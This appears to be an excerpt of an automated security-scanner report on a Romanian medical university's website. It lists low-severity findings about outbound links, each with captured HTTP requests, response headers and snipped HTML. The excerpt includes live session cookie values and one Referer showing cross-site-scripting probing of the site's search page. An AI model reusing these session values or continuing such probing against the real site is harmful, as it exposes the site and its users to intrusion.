<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">

                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en.png" />
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.47. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/lista.aspx?t=Revista-Clujul-Medical

The response contains the following links to other domains:

http://www.clujulmedical.umfcluj.ro/
http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.netlogiq.ro/
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0
http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

GET /lista.aspx?t=Revista-Clujul-Medical HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:21 GMT
Content-Length: 62576

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">

                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<br />
<a href="http://www.clujulmedical.umfcluj.ro">www.clujulmedical.umfcluj.ro</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.48. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare

The response contains the following links to other domains:

http://cazari.umfcluj.ro/
http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.netlogiq.ro/
http://www.osmcluj.ro/
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0
http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

GET /lista.aspx?t=Studenti-actuali-Prezentare HTTP/1.1
Host: umfcluj.ro
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://umfcluj.ro/search.aspx?caut=xss
Cookie: ASP.NET_SessionId=nm2p4tbhojuu3jyfqb310euy; __utma=234819994.717153536.1311096678.1311096678.1311096678.1; __utmb=234819994.1.10.1311096678; __utmc=234819994; __utmz=234819994.1311096678.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:35:37 GMT
Content-Length: 64989

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">

                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<p>
        <a target="_blank" href="http://www.osmcluj.ro">www.osmcluj.ro<br />
...[SNIP]...
<li><a target="_blank" href="http://cazari.umfcluj.ro/">Prélogement</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.49. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/lista.aspx?t=Studenti-actuali-Prezentare

The response contains the following links to other domains:

http://cazari.umfcluj.ro/
http://depcd.umfcluj.ro/public/index.php
http://forum.redbyte.ro/
http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.netlogiq.ro/
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0
http://www.umfcluj.ro/Document_Files/Rectorat-Date-de-contact/00000066/gik54_Structura%20anului%20universitar%202010-2011.pdf
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

GET /lista.aspx?t=Studenti-actuali-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.1.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:13:10 GMT
Content-Length: 82847

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Universitatea de Medicina si Farmacie Iuliu Hatieganu, Cluj-Napoca</title>
<meta n
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Studenti-actuali-Prezentare&eID=528&c=0&m=0&y=0'">Revista Studentilor</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutori</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">Descarca</a>
...[SNIP]...
<li class=""><a class="" href="http://depcd.umfcluj.ro/public/index.php" onclick="document.location.href='http://depcd.umfcluj.ro/public/index.php'">Departament Cercetare-Dezvoltare </a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://forum.redbyte.ro/">Forum</a>
...[SNIP]...
<li><a href="http://www.umfcluj.ro/Document_Files/Rectorat-Date-de-contact/00000066/gik54_Structura%20anului%20universitar%202010-2011.pdf">Structura an universitar </a>
...[SNIP]...
<li><a href="http://cazari.umfcluj.ro/">Precazare</a>
...[SNIP]...
<div id="webDesign">
<a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.50. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/lista.aspx?t=Biblioteca-Prezentare

The response contains the following links to other domains:

http://granturi.ubbcluj.ro/autodidact/services.html
http://hstalks.com/main/index_category.php?id=252&
http://online6.edqm.eu/ep701/
http://www.booksonline.iospress.nl/Default.aspx
http://www.fascicules.fr/polycopies-accueil-0.html
http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.john-libbey-eurotext.fr/fr/revues/medecine/index.phtml
http://www.liberty3.umfcluj.ro/liberty3
http://www.ms.ro/?pag=181
http://www.ncbi.nlm.nih.gov/pubmed/
http://www.netlogiq.ro/
http://www.tdnet.com/umf
http://www.umfcluj.ro/Detaliu.aspx?t=Biblioteca-Nou-in-biblioteca&eID=141&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0
http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/c1qpo_articole_expres-fr.doc
http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/cx8yx_sectia%20franceza.pdf
http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/dfbr3_carti_referinta.pdf
http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

GET /lista.aspx?t=Biblioteca-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmb=234819994.11.10.1311095567; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:40:19 GMT
Content-Length: 66728

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">

                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<li><a target="_blank" href="http://www.liberty3.umfcluj.ro/liberty3">Catalogue en ligne</a>
...[SNIP]...
<li><a target="_blank" href="http://www.tdnet.com/umf">Liste alphabétique cherchable des revues et des livres en ligne - TDNet</a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/cx8yx_sectia franceza.pdf">Liste des livres pour les étudiants de la Section Française</a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/dfbr3_carti_referinta.pdf">Collection référence (livres disponible au 3e étage)</a>
...[SNIP]...
<li><a target="_blank" href="http://www.ncbi.nlm.nih.gov/pubmed/">PubMed </a>
...[SNIP]...
<li><a target="_blank" href="http://online6.edqm.eu/ep701/">Pharmacopée Européenne 7ème édition</a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Document_Files/Biblioteca-Cautare-rapida/00000138/c1qpo_articole_expres-fr.doc">Articles sur demande</a>
...[SNIP]...
<li>Accès temporaire à la collection de livres électroniques de <a target="_blank" href="http://www.booksonline.iospress.nl/Default.aspx">IOS Press </a>
...[SNIP]...
<li><a target="_blank" href="http://www.umfcluj.ro/Detaliu.aspx?t=Biblioteca-Nou-in-biblioteca&eID=141&c=0&m=0&y=0">Livres nouveaux reçus en mai 2011 </a>
...[SNIP]...
<li><a target="_blank" href="http://www.john-libbey-eurotext.fr/fr/revues/medecine/index.phtml">Revues John Libbey Eurotext par abonnement de l'AUF</a>
...[SNIP]...
<li><a target="_blank" href="http://www.fascicules.fr/polycopies-accueil-0.html">Polycopiés nationaux des Collèges des Enseignants - Cours en Ligne de Médecine (texte integral)</a>
...[SNIP]...
<li><a target="_blank" href="http://hstalks.com/main/index_category.php?id=252&">Biomedical & Life Sciences Collection</a>
...[SNIP]...
<li><a target="_blank" href="http://granturi.ubbcluj.ro/autodidact/services.html">Livres et outils en ligne pour apprendre le roumain ou d'autres langues</a>
...[SNIP]...
<li><a target="_blank" href="http://www.ms.ro/?pag=181">Guides de pratique médicale - Ministère de la Santé (en roumain)</a>
...[SNIP]...
<div id="webDesign">
               <a target="_blank" href="http://www.netlogiq.ro">Web design</a>: <a target="_blank" href="http://www.netlogiq.ro">Netlogiq Cluj</a>
...[SNIP]...

20.51. http://umfcluj.ro/lista.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://umfcluj.ro
Path:	/lista.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://umfcluj.ro/lista.aspx?t=International-Prezentare

The response contains the following links to other domains:

http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg
http://www.netlogiq.ro/
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0
http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0
http://www.umfcluj.ro/Document_Files/Noutati/00000289/myvrj_Admission%202011%20(%20EN).pdf
http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti
http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul

Request

GET /lista.aspx?t=International-Prezentare HTTP/1.1
Host: umfcluj.ro
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uv0adfzgil2a3n55ieywykip; __utma=234819994.469475746.1311095567.1311095567.1311095567.1; __utmc=234819994; __utmz=234819994.1311095567.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 17:46:00 GMT
Content-Length: 64369

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>UMF</title>
<meta name="description" content="" />
<meta name="keywords" content=
...[SNIP]...
</script>

<script src="http://www.google.com/jsapi?key=ABQIAAAA32ysW1RVjl4Jo2ckgY4DghRnWJb16_4kFGvfr9mtVD5tHMFhVBRU8GGANv7p-GI2FWdQozIJaapxHg" type="text/javascript"></script>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=481&c=0&m=0&y=0'">Tutorat</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0" onclick="document.location.href='http://www.umfcluj.ro/Detaliu.aspx?t=Medicina-Prezentare&eID=487&c=0&m=0&y=0'">T..l..charger</a>
...[SNIP]...
<li class=""><a class="" href="http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul" onclick="document.location.href='http://www.umfcluj.ro/lista.aspx?t=Rectorat-Departamentul-de-Relatii-cu-Publicul'"><span class="dN">
...[SNIP]...
<div id="alteInfo">

                                       <a href="http://www.umfcluj.ro/Detaliu.aspx?t=Noutati&eID=289&c=0&m=0&y=0"><img height="120" width="190" alt="" src="/Images/FCK/image/poza_laterala_admitere-eng_fr.png" /></a><a href="http://www.umfcluj.ro/lista.aspx?t=Organizatii-studentesti"><img height="120" width="190" alt="" src="/Images/FCK/image/poze-laterale-organizatii-en-fr.png" />
...[SNIP]...
<br />
<a href="http://www.umfcluj.ro/Document_Files/Noutati/00000289/myvrj_Admission%202011%20(%20EN).pdf">http://www.umfcluj.ro/Document_Files/Noutati/00000289/1cadk_Admission%202011%20(%20FR%20).pdf</a>
...[SNIP]...
<div id="webDesign">
